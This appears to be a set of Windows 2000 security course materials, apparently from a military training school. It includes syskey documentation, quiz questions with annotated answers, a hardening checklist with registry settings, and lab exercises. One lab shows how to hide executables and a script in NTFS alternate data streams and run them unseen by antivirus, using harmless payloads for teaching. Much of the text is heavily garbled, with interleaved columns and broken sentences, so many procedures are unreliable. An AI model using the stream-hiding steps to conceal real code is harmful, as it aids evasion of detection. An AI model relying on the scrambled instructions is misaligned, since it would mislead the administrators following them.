The syskey command can be used again later to change the 
system key storage option or to change the password. 
To change the system key option or password 

1. Type syskey at a command prompt to bring up the 
initial system key dialog box.  

2. Click Update.  

3. In the Account Database Key dialog box, select a key 
option or change the password, and then click OK.  

4. Restart the computer.  
Changing the system key requires knowledge of, or 
possession of, the current system key. If the password-
derived system key option is used, syskey does not enforce a 
minimum password length; however, passwords longer than 
12 characters are recommended. The maximum length is 
128 characters. 
Warning

4. Restart the computer.  
When the system restarts, you might be prompted to enter the 
system key, depending on the key option you chose. 
Windows 2000 detects the first use of the system key and 
generates a new random password encryption key. The 
password encryption key is protected with the system key, 
and then all account password information is strongly 
encrypted. 
At subsequent startups: 

1. Windows 2000 obtains the system key, either from
locally stored key, the password entry, or insertion o
a floppy disk, depending on the option you chose.  

2. Windows 2000 uses the system key to decrypt the 
master protection key.  

3. Windows 2000 uses the master protection key to 

 

If the system key password is forgotten or the floppy disk that contains 
the system key is lost, it might not be possible to start the system. Protect 
and store the system key safely. If it is on a floppy disk, make backup 
copies and store them in a different location. The only way to recover the 
system if the system key is lost is by using a repair disk to restore the 
registry to a state prior to enabling system key protection. This means that 
you would lose any information or changes which have accrued since 
then. 
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ystem key options can be configured independently on all 
mputers in a domain. When configured for the system key, 

each computer has a unique password encryption key and a 
ler 

each use a different computer-generated system key stored on 
 computer-generated system key stored 

locally on a primary domain controller is not replicated. 

Before enabling the system key when you have a single 
domain controller, you might want to ensure that a second, 
complete, updated domain controller is available as a backup 
system until changes to the first domain controller are 
complete and verified. Before you change the system key 
options on a computer, it is recommended that you make a 

he emergency repair disk for that computer.  

S
co

unique system key. For example, the first domain control
might be configured to use a computer-generated system key 
stored on a disk, and secondary domain controllers might 

the local system. A

fresh copy of t
 

Kelly Larsen
Revision, Identifier Authority, Subauthorities


Kelly Larsen
Account SID, Group SID, Rights, Owner, Primary Group, Source, Type, Impersonation Level, Statistics, Restricted SIDs, Session ID


Kelly Larsen
Allows an interactive user to use a different security context to run applications and utilities.


Kelly Larsen
letters only use uppercase, characters limited to 14, passwords separated into 7 character pieces


Kelly Larsen
Kerberos
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y
ll W2K related reading assignments come from the "Microsoft Windows Security Resource Kit" 

 
Subjects covered in this reading assignment are:  Securing accounts, SIDs, Authentication, Group policies, 

ermissions, and the Encrypting File System,    

ages to read are:  33 - 43

Reading Assignment 1 
a  1 D

A

P
 
P , 67 - 113, 135 - 171 

. What are the components of a SID? 
 
 

2. 
 
 

 
 
. 

 
 
. Why is Lan Manager (LM) authentication especially vulnerable? 

 
. What is the default authentication protocol in Windows 2000? 

 
1

 
 

The contents of an access token include? 

3 What does the RunAs service do? 
 

4
 

 
 

5
 

 

 

Kelly Larsen
Kerberos;  Kerberos uses time stamps as an authenticator.  There is only a 5 minute window for Kerberos authentication


Kelly Larsen
persistently stored RAS information, trust relationship passwords, user names, passwords and account names, passwords for services that run under a user account context.


Kelly Larsen
All users and computers directly in that OU as well as users and computers in any child OU's


Kelly Larsen
prevents all GPOs from the parent container from being processed or applied to the user and computer.  You can not block the inheritance of individual GPO's


Kelly Larsen
applies to all users and computers within the container as well as all subcontainers

Kelly Larsen
Discrestionary Access Control List and System Access Control List


Kelly Larsen
Full control, modify, read & execute, list folder contents, read, write;        list folder contents
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6. Which authentication protocol protects you from replay attacks?  How? 
 

 
 

8. oes a GPO applied to an OU affect? 

 
9. 
 

 
10. Who does a Group Policy Object pertain to when it is applied to a container? 

 
 
1.  What do the acronyms DACL and SACL stand for? 

12. ich one can not be applied to a file? 

 
 

 
 
7. What are LSA secrets? 

 
 

Who d
 

 

What does block inheritance mean? 

 
 

 
 

1  
 

 
 

What permissions can be assigned to an NTFS folder?  Wh

Kelly Larsen
File Encryption Key.   It is created by the computer when a user chooses to encrypt a file.


Kelly Larsen
False, it uses a symmetric encryption algorithm


Kelly Larsen
Yes, If a user opens a file and moves it to a non-NTFS partition or to a remote server, the file will be transparently decrypted.


Kelly Larsen
Full Control and Read


Kelly Larsen
Port Scanning, Spoofing, and Denial of Service
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3. 

 

metric encryption algorithm along with the FEK to encrypt 

-NTFS partition or to 
a remote server? 

 

6. A registry key has which two basic permissions? 
 

7. puter. 

opics covered:  TCP/IP Security, Security Templates and Auditing.   

 
 

1 What does the acronym FEK stand for and when is it created? 
 
 

 
 
14. True or False, EFS uses an asym

files? 
 

 
 
15. Does decryption take place when EFS encrypted files are moved to a non

 
 
 
1

1
 

True/False:  Can administrators take ownership of files and folders on the local com

 
T
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Pages to read:  205 -241, 269 - 302, 305 – 334, 519-527 
 

17. What is TCP/IP and list some common threats to TCP/IP? 
 

 

 

Kelly Larsen
You can permit either all or only specific ports or protocols listed for TCP ports, UDP ports, or IP protocols.


Kelly Larsen
P226,AH (Authentication Header) and ESP (Encapsulating Security Payload)


Kelly Larsen
Tunneling Mode and Transport Mode


jedrusib
p. 231, Client (Respond only), Server, Secure Server

Kelly Larsen
Audit Policy, User Rights Assignment, Security Options


Kelly Larsen
Security Templates MMC snap-in, Security Configuration and Analysis MMC snap-in, Secedit.exe command-line utility


Kelly Larsen
True
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18. What does TCP filtering all do? 

 

0. 

 
 
21.    IPSec in W2K, WXP has what 3 pre-created policies? 

 
 
22.   Local policies are separated into what three sub-categories? 
 
 

3. What is included in the Security-Configuration Toolset? 

 
24. True or False, the secedit.exe command has all the functionality of the Security Configuration 

and Analysis MMC snap-in? 
 

 

 
ow you to 

 

 
 
19. What are the two protocols that comprise IPSEC? 

 
 
2 What are IPSEC's two modes? 
 
 

 

 
 
 
2
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Kelly Larsen
512KB


Kelly Larsen
Blue Screen Of Death


jedrusib
pg319. network attacks, further damage to a network by responding to suspicious behavior

Kelly Larsen
True


jedrusib
pg524 Microsoft Baseline Security Analyzer; explain

jedrusib
pg 209; TCP/UDP describe each
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25. What is the default, maximum size that an event log can reach before the overwrite behavior is 
initiated? 

2  e 

 

 

d logon events, your

ows 9 and 98 clients do not generate computer logon event entries for 

for ___________________________________________________ 

are

 

 
 
6. What is another nam

security event log? 
e for the "stop error" generated when events can not be written to th

 
 
27. By tracking faile

28. True or False, Wind

 organization might be able to prevent? 

5 
network logon events? 

29. MBSA is used 
 
30. The two core protocols of the transport layer ? 
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System Administrator/Network Manager 
Security Co r

W2K Ch
System Security

 
Service Packs/Hot Fixes/Patches 

u se

ecklist

Vulnerability Countermeasure 
IAW MSG DTG 
042100Z Mar99 Fm 
ACERT Ft Belvoir VA. 
A. Ensure all Hotfixes 

(HF)and Service 
Packs (SP) 
approved by 
ACERT are 
installed on your 
computer.  

 
Note: Review the 

rvice pack read me 
ile for 

� 1. Verify the most-current service pack for Windows 2000 
is installed. 

• From the menu bar click “Start” and then “Run”. 
• Type “winver.exe” in the dialog box and click OK.  

(You should see a dialog box that displays the 
following info. “Version 5.0 (Build 2195: Service 
Pack 1 or greater).”)  

 
�  2. Verify 128 bit version of the 
Service Pack 1 is installed: 

• Select the NDISWAN.SYS member in the 
%systemroot%\System32\Drivers directory. 

• Right-click on the member to bring up the context 
menu. 

• Select “Properties” from the context menu. 
• Select the

ote: 

se
f
hardware/software 
comp P atibility. HF/S

s may, in some case
decrease the level of 
security on your 

t system. Re-implemen
this checklist again 
after installing any 
new HF/SP.   
Failure to comply with 
these directives could leave 

 “Version” tab. 
(If the Description does not specify “US/Canada,” 
then this is not the 128-bit version.)  

 
N Run SPI-2000 after installing HF/ SP. This will help 
you to detect changes within your system.  
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o a 
s 

your system susceptible t
variety of vulnerabilitie
and attacks. 
 
Remove POSIX & OS/2 Support 

Vulnerability Countermeasures 
E
P

nsure that support for 
OSIX and OS/2 is 
moved from the 2000 

Server. Vulnerabilities exist 
th uld be exploited if 

actual  in 
e 

t 

� 1. OS/2 Subsystem File Components 
• Select the “Search” button from the Tools bar. 
• Enter the following name in the “Search for files 

and folders named” field: OS2 
• Click on the “Search Now” button. 
• If the searc  files 

 

 be on. 

will 
s 
 If 

re not documented, you should 
remove all of the above files.  

ponents 
m the Tools bar. 

     

n is 

re

at co
t rno emoved. OS/2 and 

POSIX subsystems are 
ly mapped to calls

the Win32 subsystem wher
the actual functionality is 
implemented. This can 
allow programs written for 
these subsystems to run a
root. 

h indicates that the
“OS2SS.EXE,” “OS2.EXE” or “OS2SRV.EXE”
exist, or the directory “OS2” exists, then the 

dered tooption is consi
• Remove the above listed items.  
• OS2 files should also be removed from the 

dows 2000 \dllcache directory, otherwise Win
restore them. In rare instances some mail server
require the OS/2 modules to function properly. 
these exceptions a

� 2. POSIX  Subsystem File Com
• Select the “Search” button fro

ollowing name in th• Enter the f e “Search for files 
and 

       folders named” field: POSIX PSX. 
• Click on the “Search Now” button.  

• If the search indicates that the files 
“POSIX.EXE,” “PSXSS.EXE” or 
“PSXDLL.DLL” are present then the optio
considered to be on. 

• Remove the above listed items. 
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File System Formats
Recommendations

• Use NTFS 5.0 partitions.
• Avoid the use of FAT16 FAT32 
• Use Convert Utility to convert FAT partitions to NTFS

– Sets ACLs of the converted partition to Everyone: Full Control
– Use the Security Configuration templates that contain the 

default settings for NTFS permissions, registry permissions, 
and default user rights to reset the ACLs to more secure values

 
 

File System Formats 
Vulnerability Countermeasures 

IAW MSG DTG 
042100Z Mar 99 Fm 
ACERT Ft Belvoir VA
I. Ensure that the type 
of file system you are 
using is the NTFS f
system versus the F
file system..  Alth
supported

.   

ile 
AT 

ough 
 by W2K, 

AT16 (FAT) and 
 do not provide 

d 

atted 

AT partitions to NTFS.  

F
FAT32
file/folder security 
support, encryption an
disk quotas.  

� 1. Make sure that all partitions on your server are form
using NTFS. If necessary, use the convert utility to non-
destructively convert your F
 

Warning If you use the convert utility, it will set the 
ACLs for the converted drive to Everyone: Full Control.  
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File System Formats
Recommen a

• Use Dynamic Disks
– Not recognized by oth O
– Defeats the NTFS DO h
– Disk configuration dat s

of HD
– Changes are not recorded i

 
DOS file systems  

d tions (cont)

er S
S t reat.
a i  stored in last 1 MB of space 

n partition table

Vulnerability Countermeasures 
DOS Volumes only allow 
share file/directory security.  
DOS partition could provide 
a door way to the rest of the 
system.  A user who has 
physical access to the 
machine could boot into 
DOS and use ntfsdos.exe to 
gain access to critical areas 
of the OS. 

� 1. Avoid if possible, minimize at a minimum, the use of 
FAT16 and FAT32 file systems. 
� 2. Use Dynamic Disks 
     Partitions associated with dynamic disks are not currently 
recognized by any other OS (defeats NTFS-DOS threat) 
� 3. Verify no DOS bootable partitions exist. 
� 4. Utilize Computer Management/Disk Management to 
verify file system partitions. 

 
 
Verify that all disk partitions are formatted with NTFS  

Vulnerability Countermeasures 
NTFS 5.0 partitions offer 
access controls and 

rotections such as 
file/folder security support, 

n he fly encryption (EFS) 

FAT3  
ems 

• Make sure that all partitions on your server are formatted 
using NTFS. If necessary, use the convert utility to non-
destructively convert your FAT partitions to NTFS.  

Warning If you use the convert utility, it will set the ACLs 
for the converted drive to Everyone: Full Control.  Use the 
Security Configuration templates that contain the default 
settings for NTFS per ermissions, and 

ore secure values 
 
 

p

o
a

 t
nd disk quotas that aren't 

available with the FAT16, 
2, or FAT32x file

ystsystems. These file s
are open and vulnerable.  

missions, registry p
default user rights to reset the ACLs to m
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Encrypting File System (EFS) 

• NTFS is required.
• Transparent to users.
• Introduces “Wipe” f c
• Compression cannot be

with (EFS)
• System Files not aff e
• Pagefile not affected y

 
 
Encrypting File System (EFS

un tion.
 used in conjunction 

ect d.
 b  EFS

) 
Vulnerability Countermeasures 

Once an attacker has 
physical access to the 
system the data on the 
system is vulnerable.  
Another possibility is 
the use of another OS 
(such as Linux) to 
bypass the OS and 
mount the NTFS 
volume. 
 
Note: 
Encrypt folder vice 
files.  The encryption 
of files very quickly 
becomes manually 

tensive. 

Th

in
 

e Encrypting File System (EFS) is a feature i
tomatic encrypt

ntroduced in 
ion and Windows 2000 that provides au

decryption of data on NTFS disk drives. The im
aracteristics of EFS are:  

portant 
ch
 

nd decryption 
rite and read 

ope
• It a " 

 folder, all files within it, and all 

It’s easy to use. Users can se
encryp
The new tool introduces a "W
of the d
improv
gained com
machine would be unable to recover previously deleted data. 
 
Countermeasure A 
� Use EFS to encrypt file systems 

• Right-click desired file/folder; select properties 
• Within general sheet, click advanced button 
• Within advanced attributes sheet, select encrypt 

• It’s transparent to applications. Encryption a
occ  wurs automatically as part of normal file

rations, respectively.  
pplies to folders as well as files. If the "encrypt

is selected for aattribute 
files subsequently added to it, are encrypted.  

lect files or folders to be 
ted via a checkbox on the Properties page of the item.  

ipe" function that overwrites all 
eallocated data on an NTFS drive permanently. This 
es security by ensuring that even an attacker who 

plete physical control of a Windows 2000 
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contents to secure data checkbox 
 
Note: Gotchas of EFS 

• NTFS is required.  If data is moved from an NTFS to 
non-NTFS data is decrypted. 

• Can share encrypted files but accessing or copying 
them over the network will decrypt the files. 

• Compression is mutually exclusive from encryption 
• Only user who encrypts or recovery agent can decrypt 
• System files can not be encrypted 
• Encrypted files can still be deleted. 
• Pagefile is not affected by EFS 

 
 

Encrypting File System 
TEMP

1

2

DES 

Randomly
generated

file key

3

User’s
public key

4

Recovery
ag

5

ent’s
public key

DRF
File key encrypted
with the recovery
agent’s public key

DDF
File key encrypted

with the user’s
public key

Encrypted 
file

Encrypted 
file

6

EFS (Encryption)
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EFS Driver 

1

NTFS

EFS
Service 

DDF
EFS Driver Encrypted 

file
Encrypted 

file
5

4
File key

DDF
File key encrypted

with the user’s
public key

2

6

3

Decrypted 
file

Decrypted 
file

User’s
private

key

EFS (Decryption)
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Security Templates

• Used with the MMC as a snap in.
• Text files
• Regulate and monitor access
• Security Configuration and Analysis tool 
• Fully customizable can create your own based 

on any specific circumstances or mission. 

 
 
Security Templates 

Vulnerability Countermeasures 
Security Templates 
essentially are text files. 
Anyone gaining access to 
root could create his or her 
own templates that would 

� 1. Implement Security Templates 
• From MMC console, select the Security Templates 

snap-in 
• Double-click the Security Templates icon to open it. 
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affect system security on a 

cedit.exe tool should be 
o only 

• Double-click the folder icon to open it and see the 
luded templates 

• Double-click the appropriate policy template to open 
it. 

•  Make appropriate policy selections 
C window, right-click on 

the appropriate policy template icon.  Select Save as.  
Save the policy with an appropriate name. 

he Event Log Settings for appropriate name to 

• Close the Security Templates namespace. 
 Analysis 

en prompted for a template to import, select the 
e and click Open 

icon and select configure Computer Now. 

 cumulative. 

tion of other security policies 

Doesn’t modify User Rights policy settings 
Securews, securesrv, securedc 

Recommended settings for all security areas 
 are 

configured by the compatible template 
securitysrv, highsecuredc 

unications 

Compatiblews 

Regular users are placed in the Power Users group in 
W2KPro 
Removes users from Power Users while maintaining 
legacy application compatibility ??? 

forest wide basis depending 
on the affected servers' inc
placement.  The use of 
se
restricted t
administrators. • In the left pane of the MM

• Open t
make sure you changes were saved. 

 
• Right-Click the Security configuration and

icon and select Open Database 
• Enter a filename of appropriate name and click Open 
• Wh

appropriate nam
• Right-click the Security configuration and Analysis 

When adding additional templates to an open security 
database, the effect is
 
Basicws, Basicsrv, basicdc 

Resets or reverses the applica
Ensures continued compatibility with currently installed 

applications 

Except files, folders and Registry Key which

Highsecurityws, high
Settings for network comm
No network communication capabilities with 
downlevel systems 

Provides compatibility with existing NT4.0-based 
applications 
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NTFS Streams
Unnam d Streams, Multiple Streams

• Misunderstood 
T 4.0 Server, and all 

W2K platforms

– nership of 

hroughout a 
network.

 
 
NT  

ed Streams, Name

• History

• NT 4.0 Workstation, N

• Uses
Authentication mechanism to show ow
files.

– To send malicious code undetected t

FS Streams 
Vulnerability Countermeasures 

Due to the man
which the command 
line is p
are not
manage ent utilities.   
Some o
conside
respect to streams are 

added to user’s 
quota 

• 

could h
perform

• used as a covert 
channel 

operations 
betwee
omputers 

� 1. Scan the harddrive looking for suspicious streams 

nd shareware utilities are available 
(unfortunately most have poor performance), see 

t/streams

ner in 

arsed streams 
     LADS 
Note: 

 displayed in file Several freeware a
m
f the security http://europe.iss.ne
rations with 

 and www.lancanyon.com 

• data will be 

most virus 
canners do not s

attempt to 
discover and 
scan streams 

• fragmentation 
inder 
ance 

• survive copy 

n 
c
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nd 
ackup 

supporting 
NTFS a
b
operations 

 

3-1

What is being hidden

• Data
– Text (samdump)
– Output 

• Executab

Rootkits

 

of command
les

– Program
– Games

s

–

3-1

NTFS Streams (cont)

• Available formats
– Compressed
– Encrypted

• Undetectable by on board GUI based viewing 
tools  

• Solutions
– Anti-Virus products (i.e. Norton Anti-Virus) 
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NTFS
W2K System Security 
 

Practical Exercise SAS 2C:

 ADS Practical Exercise 

 The Dangers of NTFS ADS. 
 
REQUIREMENTS:  

1. indows NT/2000/XP with NTFS partition 
2. ml)  

e from Frank Hayne Software (http://www.heysoft.de/Frames/f_sw_la_en.htm) 
 
If you have Windows NT 3.1, 4.0, 2000, and XP and use NTFS, test your system  
 
NTFS Alternate Data Streams (ADS)

W
streams.exe from SysInternals (http://www.sysinternals.com/ntw2k/source/misc.sht

r o
lads.ex

  
 

• eveloped by Microsoft for compatibility with Apples' Macintosh Hierarchical File System (HFS).  
 
• 

D

Why would Microsoft do that?  They developed a version of Microsoft Office for Macintosh and needed the 
bility to share information between HFS and NTFS. 

 
• alicious users take advantage of this by storing a virus or Trojan on your system.  Users can abuse this by 

iding graphics or data behind text files, etc. 
 

• ow to create an Alternate Data Stream:

a

M
h

H   The syntax used to create the Stream is straightforward.  An ADS 
ssociated with the file normal.txt, simply separate the default stream name from the ADS name with a colon.  
ormal.txt:hidden 

 
 

a
(n

Key issues about NTFS Data Streams 

Stream oftware. s are only visible to specialized s
Public awareness of streams is very low.  
Streams can attach themselves to directories as well as files.  
Disk space 
c

used by Streams are not reported by programs such as Windows Explorer or 
ommands such as 'DIR' 

Streams can be executed.  
Executed streams do not have their filenames displayed correctly in Windows Task Manager. 
 
 
 
 
 
 
 
 
 
Examples 
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1. Open Command Prompt and type in the following commands: 

cd \streams 
echo This is a normal text file > normal.txt 
type normal.txt 
dir normal.txt 

 
From the output, you should notice the text "This is a normal text file" appear from the type command.  You 
should also have a directory listing for the file normal.txt.   
 
What is the size of the file? __________ 

 
 

2. At Command Prompt and type in the following command: 
 

notepad normal.txt:hidden.txt 
 
Click Yes to create file, and type the following text 
 

This is a hidden text file 
 

 Exit. 

3. mmand Prompt and type in the followin

den.txt?  YES / N

What is the file size of normal.txt? _
 
Did the file size change from step 1?
(will not detect the presence of these
 
 

4. At Command Prompt and type in the 
 

more < normal.txt:hidden.txt 
 

Did you see the text "This is a hi n
 

5. We will need the program stream cated in your 
streams directory. (should be e:\
 

nd type in the following command: 

\winnt\n
\winnt\s

pt and ty

tepad normal.txt:
 

Click File > Save, then File >
 

 Back at the Co g command: 
 

Dir   
 

Was there a file hid
 

O  

_________   

  YES / NO  
 newly created ADS) 

following command: 

dde  text file"?   YES  /  NO 

e from SysInternals.  Check to make sure streams.exe is los.ex
streams)  

6. At Command Prompt a
 

type 
type 

 
 
 

otepad.exe > norma
ystem32\sol.exe > normal.txt:s.exe 

l.txt:np.exe 

7. At Command Prom
 

no

pe in the following command: 

test.vbs 
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Click Yes to create file, and type the (remember following text to click your enter key after typing your 
script.) 
 

MsgBox "Hello World!!! This could be a

 
 

Click File > Save, then File
 
 
8. At Command Prompt and type in the 

 
streams norma t
dir normal.txt 
 

What ADS files are attached to t
 

 malicious script"  

 > Exit. 

following command: 

l. xt 

he file normal.txt? 

 
 
 
 
 
 
 
Was there a change in the file size of 
 
 

In the next couple of steps we are

normal.txt?  YES / NO 

 going to execute a couple of ADS programs in normal.txt 
 
9. At Command Prompt and type in the 

 
Start .\normal.txt:s.exe 
 

Are we able to execute the s
 

10. At Command Prompt and type in the 
 
Start .\norma t

 
Did you get a message box 
 
Currently there are no antiv
 
Are NTFS ADS a security r
 
 
 
 
 

following command: 

olitaire program?  YES / NO 

following command: 

l. xt:test.vbs 

with "Hello World!!! This could be a malicious script"?  YES / NO 

irus products capable of detecting NTFS ADS. 

isk?  YES / NO 
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Why? 
 
 
 
 
 
 
 
 
What sort risk rating would you give 
 
Why? 
 

NTFS ADS?   HIGH  /  MEDIUM  /  LOW 

 
 
 
 
 
 
Should we replace 
 

NTFS w to avoid NTFS ADS?  YES  /  NO 

Why? 
 

ith FAT/FAT32 

 
 
 
 
 
 
 
Should we be scanning
 
If so, how often? ____
 
 

 our syste

________ _

 

m(s) for NTFS ADS usage?  YES  /  NO 

___ __ 
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Managing Security with Group Policy

• Configuration settings use to control behaviors 
of  objects.

 
in a uniform way.

• Apply policies to large numbers of computers

Group Policy (cont)

• Types of Configurable options
– Security options
– Manage applications

ppearance

– Redirect folders from local computers to network 

– Manage desktop a
• Group Policy settings applied to computers at 

boot time and to users when they log on.
– Assign scripts

locations.

  
Display Last User’s Name 

Vulnerability Countermeasures 
Current access procedures � 1. Use regedt32 to create or assign the following registry 

\SOFTWARE\Microsoft\Windows\ 
CurrentVersion\Policies\System 
Value Name: DontDisplayLastUserName 

MACHINE 
wsNT\CurrentVersion\Winlogon 

yLastUserName 

s 0 
RE\Microsoft\Windows\ 

CurrentVersion\Policies\System takes precedence. 
e value data on these edits must be set to 1. 

into systems using user ID 
and password are vulnerable key 

 
when one or both pieces to 
the puzzle are known. 

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: 

 
Data Type: REG_SZ 
Value Data: “1” 
 
Registry Hive: HKEY_LOCAL_

icrosoft\WindoSubKey: \SOFTWARE\M
Value Name: DontDispla
Data Type: REG_SZ 
Value Data: “1” 

 
• Default value for both registry entries i
• y: \SOFTWA The SubKe

• Th
 
 Display Legal Notice 

Vulnerability Countermeasures 
This check veri
Windows 2000 is 

fies that 

configured to display a legal  notice prior to logging on. 
Registry Hive: HKEY_LOCAL_MACHINE  

*see AR 380-53 and AR 
SubKey: \SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon 

Value 
380-5 for guidance. 

� 1. Use regedt32 to create or assign the following registry 
key 

Name: LegalNoticeCaption 
Data Type: REG_SZ 
Value Data: “US DEPARTMENT OF DEFENSE WARNING 
STATEMENT” 
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\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Policies\Syst
em 

Value Name: LegalNoticeCaption 
Data Type: REG_SZ 

S DEPARTMENT OF DEFENSE WARNING 

Registry Hive: HKEY_LOCAL_MACHINE 

 Type: REG_SZ 
Value Data: “US DEPARTMENT OF DEFENSE WARNING” 

• t one of these values must exist. 

 
registry values: 

Registry Hive: HKEY_LOCAL_MACHINE 
n 

” 
 

Value Name: LegalNoticeText 
Data Type: REG_SZ 
Value Data: “THIS IS A DEPARTMENT OF DEFENSE …” 

soft\WindowsNT\CurrentVersion\Policies\Syst

xt 

Data Type: REG_SZ 

• At least one of the registry values must exist.  
e equivalent to the below DOD 

 inputted in the value data field. 
nse computer system.  This computer 

evices 
thorized 

ll 
f 

n against unauthorized access, and to 
ability, and operational security.  

r 
 be 

system may be monitored.  Use of this DOD computer system, authorized 
or unauthorized, constitutes consent to monitoring of this system.  

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: 

Value Data: “U
STATEMENT” 
 

SubKey: \SOFTWARE\Microsoft\System 
e Name: LegalNoticeCaption Valu

Data

 
 At a minimum, at leas

 
• In the Registry Editor, navigate to each of the following

 
SubKey: \SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogo

Value Name: LegalNoticeText 
Data Type: REG_SZ 
Value Data: “THIS IS A DEPARTMENT OF DEFENSE …

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: \SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon 

 
Registry Hive: HKEY_LOCAL_MACHINE 

SubKey: 
\SOFTWARE\Micro
em 

Value Name: LegalNoticeTe
Data Type: REG_SZ 

: “THIS IS A DEPARTMENT OF DEFENSE …” Value Data
 
 

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: \SOFTWARE\Policies\Microsoft\System 

Value Name: LegalNoticeText 

Value Data: “THIS IS A DEPARTMENT OF DEFENSE …” 
 

• ingful messag A mean
Banner should be

t of DefeThis is a Departmen
system, including all related equipment, networks, and network d
(specifically including Internet access) are provided only for au
U. S. Government use.  DOD computer systems may be monitored for a
lawful purposes to ensure that their use is authorized, for management o
the system, to facilitate protectio
verify security procedures, surviv
Monitoring includes active attacks by authorized DOD entities to test o
verify the security of this system.  During monitoring, information may
examined, recorded, copied, and used for authorized purposes.  All 
information, including personal information, placed on or sent over this 
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rized use collected during monitoring may be used for 
administrative, criminal, or adverse action.  Use of this system constitutes 

Unauthorized use may subject you to criminal prosecution.  Evidence of 
unautho

consent to monitoring for these purposes. 
 
 Logon Prompt 

Vulnerability Countermeasures 
CONSIDER � 1. Use regedt32 to create or assign the following registry
customizing the Logon 

 
key value: 

SubKey: \SOFTWARE\ 
Microsoft\WindowsNT\CurrentVersion\Winlogon 
Value Name: LogonPrompt 

Note: On a default system this key needs to be added. 

Prompt.  
Registry Hive: HKEY_LOCAL_MACHINE  

Data Type: REG_SZ 
Value Data: <variable text> 

 
 Welcome Message 

Vulnerability Countermeasures 
CONSIDER � 1. Use regedt32 to create or assign the following registry
customizing the 

 
key value:  

CurrentVersion\Winlogon 
 Welcome 

xt> 

eds to be added. 

Welcome Message.  
        RegistryKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft 
        \WindowsNT\
        Value Name:
        Data Type: REG_SZ 
        Value Data:  <variable te
 
 Note: On a default system this key ne

Quotas 
Vulnerability Countermeasures 

Quotas can be utilized � 1. To enable disk
to limit the damage of a • Rig
malicious user by 

ht-click th
able

denying the success of • Also select Deny Disk Space to Users
denial of service Quot
attacks. 

 quota on a particular drive: 
e drive and selected Properties-> Quotas 
 Quota management 

 Exceeding 
a Limits 

• Select En
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Practical Exercise SAS 2D 
Exercise C 
 
This practical exercise presents an overview of Group Policy and shows how to use the Group Policy snap-in to specify 
policy settings for groups of users and computers.  Boot the system into Windows 2000 Professional and obtain from 
the instructor the appropriate user account and Organizational Unit (OU) with which to complete this exercise. Domain 
Controllers stay Administrator, in W2K Server. 
 

Scoping a Group Policy for a Domain or OU 
  

 1. Log on to the Domain using the LabuserXXa user account (password = LUXXa-pass). 
 2. Click Start, point to Programs, click Administrative Tools, and click Active Directory Users and Computers to open 

the Active Directory Users and Computers snap-in. 
 3. Click the + next to the Domain icon to expand the tree (this may take a few seconds). 
 4. Right-click the OU associated with your machine, and click properties. 
 5. Click the Group Policy tab. 

 
Creating a Group Policy Object (GPO) 
  

 6. Starting at step five, click New and in the available text box type “OUXX Screen Saver Policy”.  Once you’ve 
entered the policy name press <enter>. 

 
Editing a Group Policy Object (GPO) 
  

 7. To edit the Screen Saver Policy GPO, highlight the GPO and click the Edit button, or just double-click the GPO. 
 8. Click the + next to Computer Configuration to expand the tree (if it is not already expanded). 
 9. Click the + next to the Windows Settings. 
 10. Click the + next to the Security Settings extension. 
 11. Click the + next to the Local Policies. 
 12. Click the Security Options. 
 13. Double-click the Message text for users attempting to log on policy. 
 14. Check the Define this policy setting: and in the available box, enter Welcome to the School of Information 

Technology’s Systems Administration/Network Managers Security Course. 
 15. Click OK to close the Security Policy Setting window.  
 16. Double-click the Message title for users attempting to log on policy. 
 17. Check the Define this policy setting: and in the available box, enter Information Assurance. 
 18. Click OK to close the Security Policy Setting window. 
 19. Click the + next to User Configuration to expand the tree (if it is not already expanded). 
 20. Click the + next to Administrative Templates to expand the tree. 
 21. Click the + next to Control Panel to expand the tree. 
 22. Click the Display folder. 
 23. Double-click Hide Screen Saver tab to open. 
 24. Click the Enabled radio button. 
 25. Click OK. 
 26. Double-click Activate screen saver. 
 27. Click the Enabled radio button. 
 28. Click OK. 

 
 29. Double-click Screen saver executable name. 
 30. Click the Enabled radio button and in the “Screen saver executable name” entry space, enter “Logon.scr”. 
 31. Click OK. 
 32. Double-click Password protect the screen saver. 
 33. Click the Enabled radio button. 
 34. Click OK. 
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 5. Double-click Screen Saver time out. 
 he Enabled radio button and in the “Number of seconds to wait to enable the Screen Saver” space, enter 

 
 p Policy window. 
 
 
 1. Reboot the system into Windows 2000 Professional. (A second reboot may be necessary to apply the Screen Saver 

 2. Log on to the Domain using the LabuserXX user account (password = LUXX-pass). 
 

 
_______________________________ 

 
 

_____________________________________________________________________________________ 

 5. What screen saver was activated? 
 

_____________________________________________________________________________________  
 

 6. Once you re-authenticate, right-click the desktop and click properties.  What tabs are displayed? 
 

_____________________________________________________________________________________ 

anaging Group Policy 

 Xa user account (password = LUXXa-pass). 
 8. Click Start, point to Programs, click Administrative Tools, and click Active Directory Users and Computers to open 

 he Domain icon to expand the tree. 
 0. Right-click the OU associated with your machine, and click properties. 
 
 GPO, click the Add button. 
 3. Select the All tab from the “Add a Group Policy Object Link” window. 
 PO. 
 5.  Give the Logon Policy GPO the highest precedence by moving it up in the list of GPOs (highlight the Logon 

 6. Disable the computer configuration settings of the Screen Saver Policy GPO (highlight the OUXX  Screen Saver 
es 

 7. Click OK to close the Screen Saver Policy properties window. 
 
 rs and Computers snap-in. 
 0. Reboot the system into Windows 2000 Professional. 
 1. What appears in the User Name entry of the Graphical Identification and Authentication screen? 

_______________________________________________________________________ 

 
 

_____________________________________________________________________________________ 

_____________________________________________________________________________________ 

3
36. Click t
“30”. 
37. Click OK. 
38. Close the Grou
39. Close the OU properties window. 
40. Close the Active Directory Users and Computers snap-in. 
4
policy). 
4
43. Did the screen saver display after 30 seconds? 

_______________________________________________________
 
44. Did you have to re-authenticate to gain access to the desktop? 

_
 
4

_

4

_
 
M
  
47. Logoff and logon to the Domain using the LabuserX
4
the Active Directory Users and Computers snap-in. 
49. Click the + next to t
5
51. Click the Group Policy tab (this page displays any GPOs associated with the currently selected OU). 
52. To associate (link) a new 
5
54. Double-click the Logon Policy G
5
Policy GPO and click the Up button). 
5
Policy GPO, click the Properties button, check the Disable Computer Configuration settings check box, and answer Y
to the Confirm Disable window. 
5
58. Click OK to close the OU properties window. 
